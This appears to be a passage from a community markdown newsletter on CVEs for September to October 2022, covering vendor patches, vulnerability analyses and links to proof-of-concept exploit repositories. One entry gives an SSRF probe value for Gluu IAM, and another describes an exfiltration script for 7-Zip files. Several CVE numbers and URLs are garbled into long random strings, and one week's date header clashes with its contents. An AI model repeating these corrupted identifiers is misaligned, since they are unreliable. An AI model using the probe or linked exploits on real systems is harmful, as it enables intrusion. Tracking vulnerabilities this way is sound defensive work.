CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/text4shell-tools)\n       - [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)\n       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.\n       - Solution : Upgrade to Apache Commons 
Text 1.10.0.\n       - Description/Issue/Flaw : CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series, and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.\n\n   - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part)\n \n       - Target/Product: **Microsoft**\n       - Description/Issue/Flaw : An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in the wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. 
In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n \n   - [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)\n \n       - Target/Product: **Sophos**\n       - Description/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.\n \n \n   - [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966)](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)\n \n       - Target/Product: **SolarWinds Platform 2022.3**\n       - Affected Version : SolarWinds Platform <= v2022.3 and Orion Platform <= 2020.2.6 HF5.\n       - Description/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to insufficient control on a URL parameter, causing an insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.\n \n</details>\n\n<details>\n <summary> PoC for CVE & Exploit (Total : 12 new 0-day in last week) :\n  \n > Every week we're tracking the recently discovered Exploits and PoCs for CVEs.  
\n</summary>\n \n   - [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)\n        \n       - Target/Product: **Zemana amsdk.sys kernel-mode driver**\n       - Affected Version: Watchdog Anti-Malware 4.1.422, Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.\n       - Description : We discovered an arbitrary code injection in the Zemana amsdk.sys kernel-mode driver, a part of the Zemana Antimalware SDK. The vulnerability allows injecting arbitrary code into one of the driver's code sections and then executing it with kernel-mode privileges (local privilege escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.\n \n \n   - [PoC CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)\n       \n       - Target/Product: **Gluu**\n       - Affected Version: < v4.4.1\n       - Title : Internal network scanner through Gluu IAM blind SSRF.\n       - Description : Gluu IAM is vulnerable to a blind SSRF which can be exploited to scan the internal network for open ports depending on response times. 
To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.\n\n   - [PoC CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n       \n       - Target/Product: **Google Chrome**\n       - Affected Version: PoC maker claims \"All\" but the CVE says version < 80.0.3987.149\n       - Solution : google-chrome-upgrade-latest\n       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n   - [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)\n        \n       - Target/Product: **Microsoft Edge**\n       - Affected Version: < 97.0.1072.62\n       - Description : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute JavaScript code on every host without permission; an attacker can also steal local system files, manipulate actions against the machine, and change internal developer settings in Microsoft Edge.\n\n   - [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)\n        \n       - Target/Product: **MS Exchange**\n       - Description : The Metasploit script (PoC) for CVE-2022-41040. Microsoft Exchange is vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.
\n \n   - [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)\n        \n       - Target/Product: **Spring Cloud Gateway**\n       - Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\n       - Description : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\n   - [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)\n        \n       - Target/Product: **7-Zip**\n       - Affected Version: Tested on Version 19.00\n       - Description : 7-ZipPostExploit is a post-exploitation script to exfiltrate 7-Zip files (tested on Version 19.00; the attacker has access to plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-Zip to an external attacker server. This is done in the post-exploitation phase.\n \n   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)\n\n       - Target/Product: **Microsoft Exchange Server**\n       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.\n                     - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)\n\n   - [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)\n\n        - Target/Product: **Avira**\n        - Affected version : \"Avira Security\" for Windows version < 1.1.71.30554\n        - Description/Issue/Flaw : PoC for an arbitrary file move vulnerability in the Software Update component of Avira Security. 
Users have the option to use this feature to update any outdated software on their PC. When this feature is used, the Avira Security service drops downloaded files in c:\\ProgramData\\Avira\\Security\\Temp. The first file created in the subdirectory is in the format <random 4 numbers>_<filename>; later this file is moved to just <filename> (leading numbers and underscore are removed). This directory has DACLs that don't allow unprivileged users to modify/delete newly created files, but it does allow a user to create a junction. This can be abused by creating a junction point to a user-controlled directory which has more permissive DACLs; this way, when new files are created in subdirectories the user will be able to modify them and leverage that to obtain an arbitrary file move, which leads to LPE by writing a DLL into the system32 directory that is later loaded by a privileged service. The current PoC will load the DLL in the Windows Update service; the DLL doesn't implement any kind of mutex to check if the exploit was already executed, which results in multiple cmd.exe processes being created as the DLL is loaded multiple times.\n \n \n   - [CVE-2022-23131](https://github.com/Mr-xn/cve-2022-23131)\n        \n       - Target/Product: **Zabbix**\n       - Description : Zabbix Unsafe Session Storage.\n \n   - [Sploits](https://github.com/3sjay/sploits)\n        \n       - Target/Product: **aukey**\n       - Description : aukey-wr-01-RCE-0day.\n \n \n   - [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)\n        \n       - Target/Product: **RealVNC server**\n       - Affected Version: up to 6.9.0\n       - Description : RealVNC server up to 6.9.0 DLL Hijacking Exploit.\n\n </details>\n \n---\nHave a good Weekend#12\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022.\n\n \n      Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks 
(12th Oct - 18th October 2022).\n                                      featuring releases from Apple, Microsoft, Adobe, GitHub, Google, Linux (Ubuntu, Kali etc.), etc.\n        \n      CVE:ANALYSIS & POC:             PoC for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell\n                                      and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020\n\n         \n      CVE POC (0-Day):                CVE-2021-46422 (Google Chrome), CVE-2022-41852, CVE-2021-45067, PoC for CVE-2022-40684 & Nuclei template,\n                                      CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit\n                                    \n<details>\n<summary>\nSecurity Patched within a Week:\n \n > We track the latest security advisories of top vendors and filter out the high and critical vulnerabilities that have been patched within a week.\n</summary>\n \n- *Here’s a look at the latest security fixes (Severity : Critical or High) patched by top vendors in the last 2 weeks (12th Oct - 18th October 2022). If you're using an old version of any of the mentioned vendors' products, avoid getting tricked into opening a specially crafted website in a browsing context, which an attacker could potentially exploit, so we highly recommend **upgrading or updating vendor products from the original source.***\n \n - **Apple security advisory** : \n   - A vulnerability (CVE-2022-22658) was found in Apple iOS up to 16.0.2 (Smartphone Operating System). This issue affects some unknown processing of the component Email Handler. 
The manipulation with an unknown input leads to a denial of service vulnerability.\n \n - **Google security advisory** : \n   - This week Google released advisories for [Pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and [Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice is to update these products.\n \n - **Adobe security advisory** : \n   - Adobe has released security updates to address multiple vulnerabilities in Adobe software (ColdFusion, Acrobat and Reader, Adobe Commerce and Magento Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.\n \n - **GitHub security advisory** : \n   - The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.\n   - [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below.\n \n - Several security issues were fixed in the different versions of **Ubuntu** Linux kernel packages. 
We highly recommend updating & upgrading these packages.\n   - **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solution, etc.\n \n   - **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems\n\n   - **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel 
for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems.\n\n\n - **Microsoft** \n   - [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)\n   - Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system. [There have been 55+ security issues fixed in Microsoft products, packages & applications](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office : Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc.\n\n</details>\n\n<details>\n<summary>\nCVE Analysis, writeups & reports: (7 analyses that matter in the last 1 week)\n \n > Every week, we collect the recently discovered writeups & reports for CVEs.  
\n</summary>\n \n  - [Analysis: CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/)\n   \n     - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n     - [Nuclei template CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV40684.yaml)\n     - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n\n     - Vendor : **Fortinet**\n     - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6, and FortiSwitchManager version 7.2.0 and 7.0.0\n     - Patched : Apply updates per vendor instructions.\n     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS, FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n\n  - [Analysis: CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)\n      - Vendor : **Microsoft Products**\n      - Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable.\n      - Patched : Apply updates per vendor instructions.\n      - Description : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. 
The potential impact of an exploit of this vulnerability is considered to be very high.\n\n   - [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak)\n   - [PoC : CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067)\n\n       - Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**\n       - Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier).\n       - Description/Issue/Flaw : Out-of-bounds read caused by treating an ANSI string as Unicode in Acrobat Reader DC. This vulnerability can be exploited to leak sensitive information from the sandboxed Adobe Reader process.\n \n   - [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)\n        - Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/)\n        - Target : **vm2 JavaScript sandbox library**\n        - Affected : version < 3.9.11\n        - Description : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.  
\n\n   - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.\n       - Description/Issue/Flaw : CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series, and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.\n\n   - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 Part 1: Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) ([MSRC advisory for CVE-2022-37969](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969))\n       - Target/Product: **Microsoft**\n       - Description/Issue/Flaw : An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. 
In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in the wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n\n \n   - [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)\n        \n      - Summary :-> [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)\n      - Affected Vendors : \n <img src=\"https://user-images.githubusercontent.com/25515871/195232896-65a359b5-91b4-4dbf-ae64-05b4e8ff3a82.jpg\" width=\"500\" height=\"450\"> \n \n - Description: US authorities (NSA, FBI, CISA) expose the top 20 vulnerabilities actively exploited by Chinese state-sponsored attackers, and NSA, CISA, and FBI urge organizations to apply the recommendations below:\n\n    - Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.\n    - Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised.\n    - Block obsolete or unused protocols at the network edge.\n    - Upgrade or replace end-of-life devices.\n    - Move toward the Zero Trust security model.\n    - Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.\n \n</details>\n\n<details>\n <summary> PoC for CVE & Exploit (Total : 5+ new 0-days that matter this week and 4 important from CVEs last week) :\n  \n > Every week we're tracking the recently discovered Exploits and PoCs for CVEs.  
\n</summary>\n \n   - [PoC CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n       \n       - Target/Product: **Google Chrome**\n       - Affected Version: PoC maker claims \"All\" but the CVE says version < 80.0.3987.149\n       - Solution : google-chrome-upgrade-latest\n       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n   - [PoC CVE-2022-41852 (unofficial)](https://github.com/Warxim/CVE-2022-41852)\n        \n       - Target/Product: **Apache**\n       - Description : Remote Code Execution in the JXPath library. (For example, the methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let a user send input into the path parameter.) CVE-2022-41852 allows attackers to execute code on the application server. You can read more about this [vulnerability here](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/).\n\n \n- Important **PoCs from Last Week** :\n \n   - [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)\n        \n       - Target/Product: **Microsoft Exchange Server**\n       - Affected Version: <8.3.1\n       - Description : ProxyNotShell – CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of the zero-day bug in Microsoft Exchange Server which leads to RCE.\n \n   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)\n       - Target/Product: **Microsoft Exchange Server**\n       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.   
\n                     - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)\n \n   - [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)\n       - Target/Product: **PS5**\n       - Supported firmwares : 4.03, 4.50, 4.51\n       - Description/Issue/Flaw : PS5 kernel exploit based on TheFlow's IPv6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see the Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.\n\n   - [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)\n        - Target/Product: **Dropbox**\n        - Description/Issue/Flaw : DropBox-XPC-Exploit (https://github.com/Pwnrin/DropBox-XPC-Exploit) is an exploit for PID reuse and a logical error in Dropbox's XPC service.\n         \n</details>\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022\n\n\n\n \n    Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022).                                      
\n                                    featuring releases from Microsoft, Adobe, GitHub, Cisco, Linux (Ubuntu, Kali etc.), Firefox etc.\n\n    CVE:ANALYSIS & POC:             CVE-2022-34960, CVE-2022-41218, HackerOne report #1672388 - GitLab, CVE-2022-33987,\n                                    CVE-2022-36635 and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020\n\n         \n    CVE POC (0-Day):                Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,\n                                    CVE collection of jQuery UI XSS payloads, nuclei template for CVE-2022-35405, an updated list of CVE PoCs,\n \n                                    PS5-4.03-Kernel-Exploit, CVE-2022-41040, CVE-2022-26726, CVE-2022-30600, CVE-2022-39197, CVE-2021-29156 Exploit,\n                                    CVE-2022-30206, CVE-2022-2992, CVE-2022-41208, CVE-2022-2274 and CVE-2022-36804\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21st Sept-27th Sept 2022\n\n \n        Security Patched within a Week: Latest vulnerabilities that have been patched within a week (21st Sep-27th Sep 2022).                                      
\n                                        featuring releases from Apple, Google, Microsoft, GitHub, Linux (Ubuntu, Kali etc.), WordPress etc.\n        \n        CVE:ANALYSIS & POC:             CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, CVE-2021-41653, CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n         \n        CVE POC (0-Day):                CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos PoC,\n                                        CVE-2022-23743, Webshell - open source project, Windows10 - Custom Kernel Signers.\n  \t\n<details>\n<summary>\nSecurity Patched within a Week: \n</summary>\n- Here’s a look at the latest security fixes (Severity : Critical or High) that have been patched in a week (21st Sep-27th Sep 2022). We highly recommend upgrading or updating from the original source.\n \n- **WhatsApp** Security Advisories September Update : CVE-2022-36934 (prior to v2.22.16.12) and CVE-2022-27492 (prior to v2.22.16.2).\n- **Node.js** Update Fixes High Severity Flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. 
(Affected v18.x, v16.x, and v14.x)\n- Several security issues were fixed in the different versions of **Ubuntu** Linux kernel packages.\n  - **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.\n  - **Ubuntu 20.04 LTS** & **Ubuntu 18.04 LTS** : bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4, linux-azure, linux-azure-5.15/5.4, linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.\n\n - **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)\n- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20NX-OS%20Software%20Border%20Gateway%20Protocol%20Denial%20of%20Service%20Vulnerability&vs_k=1)\n- **Mozilla** Releases Security Updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).\n- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).\n- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405 (CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)\n- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)\n- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, 
and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616)\n- **Adobe** [Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)\n\n</details>\n\n<details>\n<summary>\nCVE Analysis & PoC (9):\n</summary>\n\n   - [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)\n        \n        - Title -> Critical Cobalt Strike bug could lead to RCE attacks.\n        - [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)\n        - Affected Version : prior to 4.7.1.\n        - Description/Issue/Flaw : The CVE-2022-39197 vulnerability exists in Cobalt Strike’s Beacon payload, which may allow an attacker to trigger XSS by setting a fake username in the Beacon configuration, thereby causing remote code execution on the CS Server.\n \n   - [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)\n        - Title -> WhatsApp “zero-day exploit” news scare – what you need to know\n        - Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12\n        - Description/Issue/Flaw : CVE-2022-36934 (An integer overflow in version v2.22.16.12 could result in remote code execution in an established video call.) & CVE-2022-27492 (An integer underflow in v2.22.16.2 could have caused remote code execution when receiving a crafted video file.)
\n\n   - [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)\n        - Title -> Securing Developer Tools: **OneDev** Remote Code Execution.\n        - Affected Version : 7.2.9.\n        - Description/Issue/Flaw : OneDev has various features such as code search, CI/CD and static code analysis; it is an open-source alternative to GitHub, GitLab and Bitbucket. In this article Paul Gerste discusses the CVE IDs listed above.\n\n   - [Analysis: CVE-2022-40286](https://www.x86matthew.com/view_post?id=windows_seagate_lpe)\n        - Title -> Exploiting a Seagate service to create a SYSTEM shell.\n        - Target & Affected Version : Seagate Media Sync.\n\n   - [Analysis : CVE-2021-41653](https://k4m1ll0.com/cve-2021-41653.html)\n       - [CVE-2021-41653 video PoC](https://www.youtube.com/watch?v=GBuuGdeTKgw&feature=youtu.be)\n       - Target/Product: **TP-Link**\n       - Title : TP-Link TL-WR840N EU v5 Remote Code Execution.\n       - Description/Issue : The goal was to achieve remote code execution on a TP-LINK TL-WR840N EU (V5) router. According to its documentation, this version came out in 2017; if you are still using the old firmware, we highly recommend upgrading to the latest version \"TL-WR840N(EU)_V5_211109\", which can be downloaded from the vendor homepage. 
